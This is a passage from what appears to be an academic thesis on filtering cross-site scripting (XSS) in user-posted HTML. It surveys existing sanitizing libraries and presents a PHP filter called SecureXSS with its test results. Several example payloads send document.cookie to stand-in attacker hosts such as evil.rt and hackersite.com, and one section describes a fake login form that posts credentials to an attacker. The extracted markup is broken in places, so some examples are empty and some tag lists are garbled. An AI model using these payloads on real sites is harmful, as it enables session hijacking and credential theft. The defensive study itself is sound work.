    AntiSamy first sanitizes the user given input using NekoHTML to avoid false positives

    because of unbalanced start or end markers. NekoHTML is a Java API that transforms unbroken

    of any version into clean XHTML 1.0, which is also standalone of its kind.

    The main validation processing takes place in a depth-first fashion. Starting with the root,

    each node is processed according to the specifications inside the security model XML file given

    with the node name (e.g., html or input). There are three modes of validation (also called

    processing actions): filter, truncate and validate and they are each described in the following

    section.

    Filter

    The filter processing action performs no validation per se, but only removes the start and

    end tags, promoting the tag’s contents. This sanitization is useful in many cases. For example, if

    you decided you wouldn’t like users to input meta tags that could mess with your robot indexing,

    setting filter would have the effect demonstrated below.

    User Input: This is some text.

    Output after Filtering: This is some text.

  • 22

    Truncate

    When the truncate processing action is set, no actual validation takes place. The truncate

    action simply removes all the attributes and child nodes of a tag, making validation of its

    attributes unnecessary. A number of tags should be set to truncate.

    User Input:
    Output after Truncating:

    Many formatting tags are set to truncate in the default policy file, including em, small,

    big, i, b, u, center, pre and more.

    Validate

    The validate processing action is where the meat of the filtering logic resides. If there are

    no attributes defined for a tag by the policy file, the validate processing action will act the same

    as the truncate processing action, except the child nodes will be validated instead of removed.

    The validate action steps through each of the attributes in the tag to be filtered and checks

    if there is a corresponding entry for that tag and attribute combination in the policy file. If no

    entry is found, the attribute is simply removed. If there is an entry, the filter tries to validate its

    value against the rules in the entry.

    There are two ways for an attribute value to be validated; by being equal to a literal string

    value or by the matching of a regular expression. Accordingly, each attribute’s definition in the

    policy can have a list of valid literal strings and a list of regular expressions to match. This is a

    departure from other XSS filters (and other security tools, in general) that don’t allow for

    multiple ways to specify valid values, which force the user into writing overly complex (and

    likely incomplete or unpredictable) regular expressions.

    When an attribute does not pass a validation check, one of a few onInvalid actions is

    taken. The possible onInvalid actions dictate what to do with the tag and its contents. The set of

  • 23

    onInvalid actions includes removeTag, filterTag and removeAttribute. The default action is

    removeAttribute.

    If an attribute with the removeTag set for its onInvalid action fails validation, the tag

    holding the attribute being checked and its contents will be removed entirely. This onInvalid

    action is reserved for those attributes, which when removed, make the presence of the tag

    meaningless. An example usage of this setting is displayed below.

    Welcome, my name is var cke = document.cookie; var url= ‘http://evil.rt/cookie.cgi’+cke; document.location = url; and I’m 25 years old!

    Above shown is the message posted by user. The result after failing to validate this code

    is shown below.

    Welcome, my name is and I’m 25 years old!

    If an attribute with an onInvalid action set to filterTag fails validation, the start and end

    tag of the node will be removed while the contents are promoted. This is exactly what happens in

    the filter processing action. The process can be seen below.

    Click on this!

    Above shown is the message posted by user. The result after passing this message to

    AntiSamy will be:

    Click on this!

    The default onInvalid action is removeAttribute. When this onInvalid action is set (or if

    none is set) on an attribute that fails validation, the attribute itself is removed from the tag, but

    the tag and its contents will remain. The process is shown below.

  • 24

    Above shown is the message posted by user. The result after passing this message to

    AntiSamy will be:

    The knowledge base for the filter’s engine is an XML file called antisamy.xml. The same

    policy file can be used across multiple implementations (.Net, J2EE, etc.). The default policy file

    was tailored to W3C’s HTML 4.0 and CSS 2.0 specifications. Thus any official attributes which

    is dictated by the specifications can be used. If a user agent supports an attribute not specified, it

    can be added to the policy file, though some effort has already been put in integrating those non-

    standard attributes which are being used and honored in the wild.

    To summarize, OWASP AntiSamy is an API implemented in Java and .Net to ensure

    user-supplied HTML/CSS is in compliance within an application rules. It has very good XSS

    cleaning abilities, so long as it removes things it doesn’t recognize. Architecturally speaking,

    OWASP AntiSamy is highly dependent on policy files, which is a highly extended form of XML

    Schema with information on what attributes and elements to allow. As such, the actual code for

    filtering is relatively light-weight. Unfortunately, while XML Schema files can get a high level

    of control on the validation, the regular expression heavy approach begins showing signs of

    stress when data-types are complex (e.g. URIs).

    3.2 The strip_tags()

    The PHP function strip_tags() [STT] is the classic solution for attempting to clean up

    HTML from unwanted tags (like or ). It is the worst solution of all to avoid

    XSS because, the fact that it doesn't validate attributes at all (means that anyone can insert

    malicious scripts in attributes like onmouseover='xss();' and exploit the application). While this

    can be bandaided with a series of regular expressions that strip out on[event], striptags() is

    fundamentally flawed and should not be used. Example of using strip_tags is illustrated below:

  • 25

    echo strip_tags($text, '

    '); // Allow

    and

    ?>

    In the above example, strip_tags() strips all the tags except

    and tags. By using

    this malicious tags like , and can be stripped out, but we cannot validate

    the values of attributes. To validate attributes of tags, we can write extra code at server side, but

    the solution cannot be efficient and effective.

    3.3 PHP Input Filter

    PHP Input Filter [PIF] is the upgraded version of striptags(), with the ability to inspect

    attributes. PHP Input Filter implements an HTML parser, and performs very basic checks on

    whether or not tags and attributes have been defined in the whitelist (left upto user what he will

    permit). Since it completely fails in checking the well-formedness, it is trivially easy to trick the

    filter into leaving unclosed tags. Any user that allows the style attribute will be in great trouble as

    we can't simply just let CSS through and expect layout not to be badly mutilated.

    3.4 HTML_Safe/SafeHTML

    HTML_Safe/SafeHTML [HTS] mechanism of action involves parsing HTML with a

    SAX parser and performing validation and filtering as the handlers are called. strip_tags can only

    strip tags. HTML_safe strips down all active content, including tags, attributes and values of

    atrributes. This parser strips down all potentially dangerous content within HTML:

    opening tag without its closing tag

    closing tag without its opening tag

    any of these tags: "base", "basefont", "head", "html", "body", "applet", "object",

    "iframe", "frame", "frameset", "script", "layer", "ilayer", "embed", "bgsound", "link", "meta",

    "style", "title", "blink", "xml" etc.

    any of these attributes: on*, data*, dynsrc

    javascript:/vbscript:/about: etc. protocols

  • 26

    expression/behavior etc. in styles

    any other active content

    It also tries to convert code to XHTML valid, but htmltidy is far better solution for this

    task. HTML_Safe does a lot of things right, like blacklisting the list of dangerous attributes, But

    by blacklisting tags (like style, applet, etc) for the reason that it have some dangerous attributes

    will result in loss of functionality. Added to this it blocks all the occurrences of XSS by stripping

    it off.

    3.5 Kses

    Kses [KSS] is an HTML/XHTML filter written in PHP. It removes all unwanted HTML

    elements and attributes, and it also does several checks on attribute values (to avoid buffer

    overflow attacks). Kses can be used to avoid XSS, as it will only allow the HTML elements and

    attributes that it was explicitly told to allow. It will remove additional "" characters that

    people may try to sneak in somewhere. The set of API’s that Kses allow its user to use are shown

    below with explaination.

    Table 3.1: Kses API’s

    API Functionality

    Parse($string = "") The basic function of kses. Give it a $string, and it will strip out

    the unwanted HTML and attributes.

    AddProtocols() Add a protocol or list of protocols to the kses object to be

    considered valid during a Parse(). The parameter can be a string

    containing a single protocol, or an array of strings, each

    containing a single protocol.

    Protocols() Deprecated. Use AddProtocols()

    AddProtocol($protocol = "") Adds a single protocol to the kses object that will be considered

    valid during a Parse().

  • 27

    SetProtocols() This is a straight setting/overwrite of existing protocols in the

    kses object. All existing protocols are removed, and the

    parameter is used to determine what protocol(s) the kses object

    will consider valid. The parameter can be a string containing a

    single protocol, or an array of strings, each constaining a single

    protocol.

    DumpProtocols() This returns an indexed array of the valid protocols contained in

    the kses object.

    DumpElements() This returns an associative array of the valid (X)HTML elements

    in the kses object along with attributes for each element, and

    tests that will be performed on each attribute.

    AddHTML($tag = "", $attribs

    = array())

    This allows the end user to add a single (X)HTML element to

    the kses object along with the (if any) attributes that the specific

    (X)HTML element is allowed to have.

    RemoveProtocol($protocol =

    "")

    This allows for the removal of a single protocol from the list of

    valid protocols in the kses object.

    RemoveProtocols() This allows for the single or batch removal of protocols from the

    kses object. The parameter is either a string containing a

    protocol to be removed, or an array of strings that each contain a

    protocol.

    filterKsesTextHook($string) For the OOP (Object Oriented Programming) version of kses,

    this is an additional hook that allows the end user to perform

    additional postprocessing of a string that's being run through

    Parse().

    _hook() Deprecated. Use filterKsesTextHook().

  • 28

    Configuring and usage of the Kses API’s are very simple and flexible, like user can set

    the protocols that he want to allow or disallow, user can configure the API to add or remove the

    element or attribute from the preconfigured Kses. Users are supposed to be very cautious in

    using API’s, as different ways of using API’s results in different functionality. But Kses is not a

    very good option as it has many loop holes which are exposed publicly by its users [GEL].

    3.6 htmLawed

    To say about htmLawed in its developers words, the highly-customizable htmLawed

    [HTM, HTL] filter can be used to make text with HTML more secure, policy-compliant. It can

    auto-correct and beautify HTML markup and restrict HTML elements (tags), attributes, and URL

    protocols in the input. It also balances tags and checks for proper nesting of the HTML elements.

    Furthermore, it can transform deprecated tags and attributes, check and convert character entities

    (e.g., from hexadecimal to decimal type), obfuscate email addresses as an anti-spam measure,

    etc. The set of features that htmLawed provides seems to be quite appreciable. But it just strips

    of all the occurrences of script. It fails in validating and differentiating the simple script from

    XSS.

    At the other hand, web researches say [HTP]; htmLawed is modified version of Kses

    (with some features added). It just strips of the script tag in order to avoid execution of script and

    validation of attribute values is not so good (it allows inclusion of cgi/javascript/html files which

    may lead to XSS).

    3.7 Safe HTML Checker

    Safe HTML Checker [SHC] is of same flavor as others, but which is well written piece of

    code (strict in checking and parsing the tags). It is a white listing filter which filters all

    occurrences of non found tags in the filter list. It is very strict in filtering all the occurrences of

    script and CSS (Cascading Style Sheet). Safe HTML Checker is developed to satisfy the

    requirements shown below.

    1. Entered markup should be valid to XHTML strict, to stop comments form breaking

    validation and keep things nice and tidy.

  • 29

    2. No presentational markup! They wanted web administrator to have complete control over

    style sheets and comments posted should only be able to use structural HTML elements.

    3. Attributes should be restricted to those that add semantic meaning. Javascript event

    attributes and CSS related attributes should not be allowed.

    4. Web Administrator should retain full control over the tags and attributes allowed in the

    comments.

    5. Submitted HTML must be kept free from anything that could pose a security risk, such as

    javascript: URLs.

    Just to satisfy these requirements, developer of Safe HTML Checker was not much

    worried in the loss of functionality by his solution.

    3.8 HTML Purifier

    HTML Purifier [HTP] is a standards-compliant HTML filter library written in PHP.

    Developers of HTML Purifier claim that it will remove all scripting code by auditing it

    thoroughly, which is the loss of functionality provided. This is not less than all other existing

    solutions in stripping off all the occurrences of script.

    3.9 Summary

    Regarding the available API/tool support, the present situation is not so (at all)

    encouraging. Even the combination of all the approaches is not promising for web application

    security; hardly any tools support the proper approach. Absence of holistic approach in

    identifying the proper XSS attack is genuine matter of concern for web application security.

  • 30

    CHAPTER 4

    PROBLEM STATEMENT

    Simple script inserted in the message is very often misunderstood as XSS attack.

    Scripting is a functionality provided for better ever experience. In existing solutions, any script

    inserted is always assumed to be malicious and being stripped. For example, alert(“XSS”) is not

    malicious because it does not harm the user. In contrast, alert(document.cookie) is malicious

    because it is trying to access the browser DOM object (which is supposed to be secure). This

    may lead to hijacking of the user session. As per security terms, one that harms a legitimate user

    is an attack. Hence we claim that just inserting any script cannot be XSS attack.

    Having understood the XSS attacks, another challenge that we identified to safe guard the

    users from XSS attacks is whether to go with server side solution or client side solution. Client

    side solution can help the users who are security conscious; who are familiar of XSS attacks and

    the one who have some technical expertise (to use the solution we provide), such solution may

    not help the novice users.

    This project aims at developing holistic server side XSS API which differentiates the

    XSS attack from simple script and strips it off. Thus novice users can enjoy the safe and better

    experience of browsing without any surge of functionality, need of additional software or

    configuration at browser side. Developing such API also reduces burden to web administrators to

    safe guard their web applications from malignant XSS attacks.

  • 31

    CHAPTER 5

    DIFFERENTIATING XSS FROM SIMPLE SCRIPTS

    An analysis of available and widely used solutions for XSS is discussed in Chapter 3.

    The point that existing solutions are missing out and giving scope for the new set of problem (s),

    are discussed in Chapter 4. This Chapter will roam around the solution for the problem/challenge

    identified.

    As it is well known fact that XSS will occur because of some malicious script inserted

    by an attacker in the web application, before we find what can be malicious script, we should

    find the scope of an attacker to insert malicious script in the web application. Basically while

    designing the Markup Languages, none of the tags and/or its attributes is meant for malicious

    purpose. They are made for the genuine usage, but the attackers/hackers use these tags and /or its

    attributes for their profits (basically for name or fame or robbing). By our observation, we found

    a list of tags and/or its attributes which give scope for an attacker to insert malicious script, and

    the same is shown in Table 5.1:

    Table 5.1: Tags and its attributes which are in favour of attackers

    Tag Attribute

    form action

    body background

    applet code

    object data

    a, area, link href

    iframe, frame, img longdesc

    img onabort

  • 32

    a, area, button, input, label, select, textarea onblur

    input, select, textarea onchange

    a, abbr, acronym, address, area, tt, i, b, small, big, body, button,

    caption, center, em, strong, dfn, code, samp, kbd, var, cite, col,

    colgroup, dd, del, dir, div, dl, dt, fieldset, form, h1 - h14, input, ins,

    label, legend, li, link, map, menu, noframes, noscript, ol, hr, img,

    optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody

    td, textarea, tfoot, th, thead, tr, u, ul

    onclick, ondblclick,

    onkeydown,

    onkeypress, onkeyup,

    onmousedown,

    onmousemove,

    onmouseout,

    onmouseover,

    onmouseup

    h15 ondblclick

    h15 - h16, onmousedown

    h15 - h17, onmousemove

    h15 - h18, onmouseout

    h15 - h19, onmouseover

    h15 - h20, onmouseup

    h15 - h21, onkeydown

    h15 - h22, onkeypress

    h15 - h23, onkeyup

    body, frameset onload

    a, area, button, input, label, select, textarea onfocus

    form onreset

  • 33

    input, textarea onselect

    form onsubmit

    body, frameset onunload

    frame, iframe, img, input, script src

    a, abbr, acronym, address, applet, area, tt, I, b, small, big,

    basefont, bdo, blockquote, body, br, button, caption, center, em, strong,

    dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt,

    fieldset, font, form, frame, frameset, h1 - h11, hr, iframe, img, input, ins,

    label, legend, li, link, map, menu, noframes, noscript, object, ol,

    optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody,

    td, textarea, tfoot, th, thead, tr, u, ul

    style

    Having understood that the above tags and/or its attributes give scope for an attacker to

    insert some malicious script, it is extremely necessary to know, how they are accessible to an

    attacker. The total set of attributes found vulnerable can be categorized into three types:

    1. Set of attributes giving scope for content out of the actual page, such as href, src, etc,

    through which a page/object with some malicious content can be included in the

    existing page.

    2. Set of attributes which allows user to write script directly, such as onload, onmouse,

    onclick, etc, through which some malicious script can be included.

    3. Set of attributes which allows user to do stylings for his content.

    These three categories how they are different can be understood better with an example.

    The first type is the set of attributes which include external object/content to the current/existing

    page. To illustrate how these attributes can act malicious, we’ll take tag of image type.

    For the tag of image type, some external image content will be fed using an attribute

  • 34

    called “SRC”, which displays the image in the existing page. But an attacker will insert some

    malicious script instead of feeding the location of the image location. One such example is

    shown below, which will alarm with the session cookie, every time the page is loaded. Just

    alarming is exactly not malicious script, but since it is alarming with the user session cookie

    which is supposed to be secure, it is considered to be malicious.

    The set of attributes that belong to this category are: action, background, classid, code,

    data, href, longdesc, src.

    This type of attributes should be set to restrictions in allowing the external content based

    on the tag and type of attribute. The allowed set of extensions for each of the tag and its

    attributes are shown below:

    Table 5.2: Extensions allowed

    Tag Attribute Allowed Extensions

    img, input

    (type=image)

    src, lowsrc,

    dynsrc

    .jpg, .jpeg, .png, .xbm, .gif, .bmp

    a, area, link href .htm, .html, .asp, .jsp, .php, .aspx, .swf, .rb, .pl, .cgi

    frame, iframe src .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp,

    .php, .aspx

    Any Tag longdesc .txt, .rtf, .doc

    embed src .pdf, .doc, .wav

    Any Tag background .jpg, .jpeg, .png, .xbm, .gif, .bmp

    script src This attribute is not allowed

    bgsound src .wav, .mid, .au

  • 35

    applet code .class

    object classid .class, .py, .rb

    object data .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp,

    .php, .aspx, .flv, .mov, .wmv, .rm, .ra, .ram

    The second type is the set of attributes which allows users to insert some script directly.

    Allowing user to insert script directly is similar to leaving the bank open 24 Hrs, which makes

    easy for thief to rob the bank. But in the way banks make its security system alert to protect their

    customer’s wealth from thief, web administrator should make sure of the security system, to safe

    guard the novice users. To understand how these type of attributes how it can be malicious, an

    example is illustrated below, which will open a new window every time the page is loaded and

    posts the novice user’s session cookie to attacker site through which session hijacking will be

    done.

    The set of attributes that belong to this category are: onblur, onclick, ondblclick, onfocus,

    onmousedown, onmousemove, onmouseout, onmouseover, onmouseup, onkeydown, onkeypress,

    onkeyup, onload, onunload, onabort, onblur, onchange, onreset, onselect, onsubmit.

    The last and the third kind of attribute set will allow user to set the style for his content.

    Examples explained for Type 1 and Type 2 categories of attributes are modified here to illustrate,

    how third set of attributes can be used as vulnerable.

    The only attribute that belongs to this category is style.

  • 36

    To save novice users from XSS, we should contemplate on four more tags apart from all

    the attributes listed above, namely , , and tags. The tag

    will be used by an attacker to insert some malicious script directly. The tag is generally

    used to refer the defined path for the content in the page. This also can be used by an attacker to

    edit the path of reference or redirect it to his site. In the way style attribute is used, similarly

    tag will be used to insert malicious script. Such an example is shown below:

    background-image: url(window.open(

    http://hackersite.com/info.pl?captcha=document.cookie

    In the above example, instead of giving the back ground image URL, a malicious script

    is given, which on execution will open a new window and sends the user’s session cookie to

    hacker’s site.

    To save users from XSS kind of phishing attack which is explained in Section 2.6.3, we

    should ponder upon inner text and action attribute of tag. Illustration of how

    tag’s inner text will be used by an attacker is shown below:

    User Name:
    Password:

    In the example shown above it creates the html form that displays two text boxes asking

    username and password, on submit which posts the content to hacker’s site. If an attacker posts

    this message in the banking website user forum, when an innocent user visits this page, he will

    login and which may result in huge loss for the user. Since inner text of tag has such a

    serious impact it is always better to strip off any content in tag. Apart from inner text of

    tag, ‘action’ attribute also can be used by an attacker to hack the user’s username and

    password. An attacker will post a message with tag and some malicious script which will

    replace the actual tag with this inserted one. The result of such post is obvious that it

  • 37

    causes huge losses to innocent lame users. Hence ‘action’ attribute of tag also should be

    removed from user posted message.

    Having understood that the above tags and attributes allow an attacker to insert some

    scripts to a web application and all the scripts that are inserted cannot be XSS, next step is to find

    out what sort of scripts make the XSS possible.

    As it is well known that, script that harms is an attack. In case of web applications, harm

    that will occur to its users can be session hijacking, denial of service, phishing and altering the

    page content. By hacking the user session cookies, attacker can hijack legitimate user session.

    Denial of service can be done in many ways, like not allowing the user to visit the page he

    wanted to visit by changing the page location or infinitely throwing alerts, etc. Phishing can be

    done by creating/editing the forms on the web page.

    As the problem is now narrowed down to certain possibilities, now it is not difficult for

    someone to find out what sort of script (s) causes all such issues to a novice user. Our work on

    finding out the malicious scripts resulted in restricting access to some set of DOM properties.

    The Table 5.3 shows some DOM properties, which we should make sure that no attacker will

    access it, in order to protect the legitimate user.

    Table 5.3: DOM Properties which will cause XSS attacks

    DOM Property Reason

    Document.cookie This property will be used to steal the innocent user session.

    Document.location, Location.href, Location.replace, Location.reload, Window.location, Window.location.reload(), Window.top.location, location.assign, window.self.location, document.reload

    These DOM properties will be used to edit the document location and make a denial of service attack.

    Window.history, history.forward, This DOM property will be used to access history of the

  • 38

    history.go, history.back browser window, keep showing the pages from history and not allowing user to access the page he wants to visit.

    Document.write, document.writeln These properties will be used by an attacker to edit the page content.

    Document.title This property will be used to change the title of the page

    Window.status, window.defaultStatus

    These properties will be used to change the status of the page and create panic to legitimate user.

    Document.getElementById, document.getElementsByName, document.getElementsByTagName

    These properties will be used to set the values of tag attributes in the page

    Document.anchors, document.forms, document.frames, document.images, document.links, window.frames

    These properties will be used to set the values to the corresponding tags in the page.

    To save legitimate users from the hands of an attacker, we should find out all the

    occurrences of any of the above shown properties, in the attributes shown in the Table 5.1 and

    strip it off. Not only in the attributes shown in Table 5.1, but also in the inner text of tag

    and tag.

    If we can strip off all the malicious scripts at all the occurrences stated above

    successfully, we can save the novice users from malignant XSS.

  • 39

    CHAPTER 6

    IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS

    As explained in Chapter 4, the solution that we come out with should not burden up the

    lame user (user without any technology background) with extra configurations or installations at

    browser end. At the same time he should enjoy the secure browsing with no surge in

    functionality. Having understood all the challenges identified and solution proposed in Chapter

    5, our goal is to implement a server side API, which should be fast, should not weigh down the

    web server, makes minimal encumber to web developers/administrators.

    This part of the thesis revolves around procedure of the solution, implementation details,

    working of solution, results and finally comparison of our solution with other existing solutions

    (with respect to time, not with respect to functionality)

    6.1 Procedure

    The abstract view of the solution explained in chapter 5 may not help the reader/user to

    understand the solution. For the benefit of reader/user, core of the solution is presented here in

    this section.

    Algorithm 6.1 (High-level Algorithm explain procedure of SecureXSS)

    Input: Input given by user (can be plain text or HTML or script)

    Output: XSS free user input (Filtered user message)

    1. Generate DOM for all the tags in the user given input.

    2. Parse for all occurrences of script attributes (Type 2 kind of attributes explained in

    Chapter 5).

    3. Normalize value of each attribute, for each occurrence in step 2 and validate it.

    4. Restrict the value of attribute for Type 1 kind of attributes as defined in Table 5.2.

  • 40

    5. Find all the occurrences of script tag, remove src attribute if set, normalize and

    validate the inner text of script tag.

    6. Find all the occurrences of style attribute, normalize and validate it.

    7. Find all the occurrences of style tag and normalize the inner text and validate it.

    8. Find all the occurrences of form tag remove action attribute if set and strip off the

    inner text of form tag.

    9. Remove the attributes which got failed in validation from step 3 through step 8.

    10. Return the XSS free output.

    6.2 Implementation Details

    Having understood the solution in detail, from the procedure given above, in this section

    we will present the implementation details of SecureXSS API. SecureXSS is the server-side XSS

    filtering API, developed in PHP5. To generate DOM for the user given input, we are using

    Simple HTML DOM Parser [HDP], which is an open source API, written in PHP.

    The current version of SecureXSS is the model API developed in PHP5 to make web

    developer’s job alleviate, which results in secure browsing for innocent users. This model is

    developed to prove the correctness of the solution. Interested web developers can feel free to port

    this solution to other server-side technologies (like asp, jsp, etc) that they are interested in.

    As it is said above, in our implementation, we used Simple HTML DOM Parser (since

    we felt it is working better compared to other DOM parsers) to parse and generate DOM for the

    user input or given message. The current implementation of API restricts itself to Simple HTML

    DOM Parser. The users who wish to use their own DOM parser or any other available DOM

    parser, may have to rewrite the API for their usage. Once the DOM tree is generated for all tags

    in the user given input, Step 2 to Step 9 in the above said procedure will be same.

  • 41

    6.3 Working of SecureXSS

    SecureXSS is the server-side XSS filtering API, which validates and returns the non-

    malicious user given input, on passing the malicious user input. The usage of SecureXSS API is

    illustrated below in Figure 6.1. When user sends post request to web server, it instantiates the

    API and forwards the user input to API. API validates and strips all the malicious content and

    returns the non malicious content back to server, on which the user requested operation is

    processed by web server.

    Figure 6.1: Server-side XSS Filtering API

    Steps shown above in Figure 6.1 are explained below:

    1. Client sends post request to web server.

    2. Web server sends request to SecureXSS API.

  • 42

    3. SecureXSS sends back the non-malicious user request.

    4. Web server stores the user post in database (or) it processes the request in other case.

    Here we will see working of the solution on the sample html shown below.

    document.write("

  • 43

    6.4 Results

    Security mechanisms cannot be comprehensively tested because it’s impossible to prove

    a negative. Another way of saying that is, there is no way of knowing if the set of all publicly

    known attacks, which can be incorporated into test cases, is equal to the set of all possible

    attacks. A subset (200 vectors) of all publicly known XSS attacks gathered from recognized

    knowledge bases [RSN] [W3S] have been tested with 100% effectiveness (shown in Appendix

    II). Out of 200 vectors we collected, 100 are malicious and other 100 are non malicious (as

    explained in Chapter 4).

    Running time was also a very important consideration given the importance of

    availability and response time for enterprise applications. In order to do the timing tests, we have

    collected a set of 350 web pages from popular sites like http://news.yahoo.com/,

    http://news.google.com/ and http://msdn.microsoft.com/. The results from our timing tests

    (overhead) are shown in Table 6.1.

    Table 6.1: SecureXSS timing test (overhead) results

    Size of HTML (KB) Average Execution Time (Sec)

    10-30 0.095048352

    31-60 0.182305614

    61-90 0.234215016

    91-120 0.269700872

    The results shown above are shown as graph in Figure 6.2, in which Size of HTML is

    taken on X-axis and Execution time on Y-axis. Results shown above are taken on Intel Core 2

    Duo 3.0 GHz system with 2GB RAM, running Windows XP Professional SP2, using XAMPP

    web server.

  • 44

    Figure 6.2: SecureXSS overhead on the server

    The results are also compared with another popular XSS API called HTML Purifier,

    which is shown in Appendix III. As HTML Purifier is compared with all other solutions in

    [HTP], we can say SecureXSS works very good compared all the existing server side XSS

    filtering API’s.

    Size of HTML – X-axis Execution Time – Y-axis

  • 45

    CHAPTER 7

    CONCLUSIONS

    Internet has revolutionized different aspects of human life, the way people communicate,

    do business, etc. But the trust on these applications and the users experience is not fully

    satisfactory due to plethora of security breaches which happen frequently in many critical

    applications like banking, which leads to privacy threat of the legitimate customers’ details. So

    this project will help in increasing the security of the web applications, hence enhancing the trust

    on these applications by the end customers and providing a better experience online.

    This project addresses the most important issue faced by current day web users, which is

    Cross-site Scripting (XSS) attack. The important goal of this project was to build a server side

    XSS filtering API which differentiates the simple script from malevolent XSS, besides which

    execution time is also considered to be one of the factors. In the way, we worked on

    differentiating simple XSS from XSS (as no existing server side XSS API’s are differentiating

    simple script from XSS). We proposed an approach for differentiating simple script from XSS.

    We also developed an open source server side XSS filtering model API called SecureXSS

    (pronounce as Secure Excess), which differentiates simple script from malignant XSS.

    Scope for Future Work

    The developed model API works very fine in stripping out the genuine XSS (including

    XSS worms and virus), but however it is restricted to PHP, as it is developed in PHP. The same

    logic/work can be extended to all the other server side scripting languages (like asp, jsp, etc), so

    that all classes of web developers can use the solution.

  • This Page is intentionally left blank

  • 46

    REFERENCES

    [OWA] OWASP Top 10, The Ten Most Critical Web Application Security vulnerabilities, http://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf, Last Accessed: July 7, 2009.

    [CER] Cert advisory ca-2000-02 malicious html tags embedded in client web requests., February 2000.

    [XSS] Cross-site Scripting (XSS), www.owasp.org/index.php/Cross_site_scripting, Last Accessed: July 7, 2009.

    [USC] US-CERT. eBay contains a cross-site scripting vulnerability. http://www.kb.cert.org/vuls/id/808921, 2006.

    [KLE] Amit Klein. DOM Based Cross Site Scripting or XSS of the Third Kind. http://www.webappsec.org/projects/articles/071105.shtml, 2005.

    [PEW] Pew Internet & American Life Project Report: Spam and Phishing. http://www.pewinternet.org, 2005.

    [STA] Ed Stansel. Don’t Get Caught by Online Phishers Angling for Account information. Florida Times-Union, 1997.

    [OLL] Gunter Ollmann. The Phishing Guide, Understanding & Preventing Phishing Attacks. NGSSoftware Insight Security Research, 2004.

    [RRO] J.Martin, Justus Winter. RequestRodeo: Client Side Protection against Session Riding. In OWASPAppSec2006Europe, 2006.

    [ROB] Robert Auger. The Cross-Site Request Forgery (CSRF/XSRF) FAQ. http://www.cgisecurity.com/csrf-faq.html. Apr, 2008.

    [CSRF] Cross Site Request Forgery, An introduction to a common web application weakness. Jesse Burns 2007.

    [JEG] Jeremiah Grossman, Robert “RSnake” Hansen, Petko “pdp” D. Petkov, Anton Rager, Seth Fogie, XSS Attacks Cross-site Scripting Exploits and Defence, Syngress Publishing, Inc., ISBN-13: 978-1-59749-154-9.

    [BBC] BBCode, http://en.wikipedia.org/wiki/BBCode, Last Accessed: July 7, 2009.

    [WIT] Wikitext, http://en.wikipedia.org/wiki/Wikitext, Last Accessed: July 7, 2009.

    [MAD] Markdown, http://daringfireball.net/projects/markdown/, Last Accessed: July 7, 2009.

  • 47

    [TEX] Textile, http://textism.com/tools/textile/, Last Accessed: July 7, 2009.

    [STT] Strip_tags – Manual, http://php.net/manual/en/function.strip-tags.php, Last Accessed: July 8, 2009.

    [PIF] PHP Input Filter, www.phpclasses.org/browse/package/2189.html#download, Last Accessed: July 8, 2009.

    [HTS] HTML_Safe, http://pear.php.net/package/HTML_Safe/, Last Accessed: July 8, 2009.

    [KSS] Kses, http://sourceforge.net/projects/kses/, Last Accessed: July 8, 2009.

    [HTL] htmLawed, www.bioinformatics.org/phplabware/internal_utilities/htmLawed/index.php, Last Accessed: July 8, 2009.

    [SHC] Safe HTML Checker, http://simonwillison.net/2003/Feb/23/safeHtmlChecker/, Last Accessed: July 8, 2009.

    [HTP] HTML Purifier, http://htmlpurifier.org/, Last Accessed: July 8, 2009.

    [ANT] Dabirsiaghi, Arshan, Towards Automated Malicious Code Detection and Removal on the Web, Open Web Application Security Project, Aspect Security, Inc., 2007.

    [GEL] Security issues in Kses - Geeklog, http://www.geeklog.net/article.php/kses, Last Accessed: July 16, 2009.

    [HTM] htmLawed, http://drupal.org/project/htmLawed, Last Accessed:July 16, 2009.

    [HDP] PHP Simple HTML DOM Parser, http://simplehtmldom.sourceforge.net/, Last Accessed: July 20, 2009.

    [RSN] XSS (Cross-site Scripting) Cheat Sheet, http://ha.ckers.org/xss.html, Last Accessed: July 24, 2009.

    [W3S] W3Schools, http://www.w3schools.com, Last Accessed: July 24, 2009.

  • This Page is intentionally left blank

  • 48

    APPENDIX I

    OWASP THE TEN MOST CRITICAL WEB APPLICATION SECURITY VULNERABILITIES

    The Open Web Application Security Project (OWASP) (www.owasp.org) is a worldwide

    free and open community focused on improving the security of application software. OWASP’s

    mission is to make application security visible, so that people and organizations can make

    informed decisions about true application security risks.

    The primary aim of the OWASP Top 10 is to educate developers, designers, architects

    and organizations about the consequences of the most common web application security

    vulnerabilities. This is based on the MITRE Vulnerability trends (explained in

    http://cwe.mitre.org/documents/vuln-trends/index.html), from which the top ten vulnerabilities

    are distilled. The following are the ranks of the vulnerabilities:

    Figure 1: MITRE data on Top 10 web application vulnerabilities for 2006

    [OWA] discusses each of the vulnerability in detail along with the protection measures

    to be taken to protect the application from these vulnerabilities. However, it is considered that

  • 49

    the most common vulnerabilities like Unvalidated input, Buffer overflows, integer overflows and

    format string issues, Denial of service and Insecure configuration management are taken care of

    in the web applications. The following table provides a brief discussion about the top 10 web

    application vulnerabilities listed in the OWASP Top 10 2007 [OWA].

    Table 1: OWASP Top 10 Web Application Vulnerabilities

    Vulnerability Description

    A1 – Cross Site Scripting (XSS)

    XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim’s browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

    A2 – Injection Flaws

    Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker’s hostile data tricks the interpreter into executing unintended commands or changing data.

    A3 – Malicious File Execution

    Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile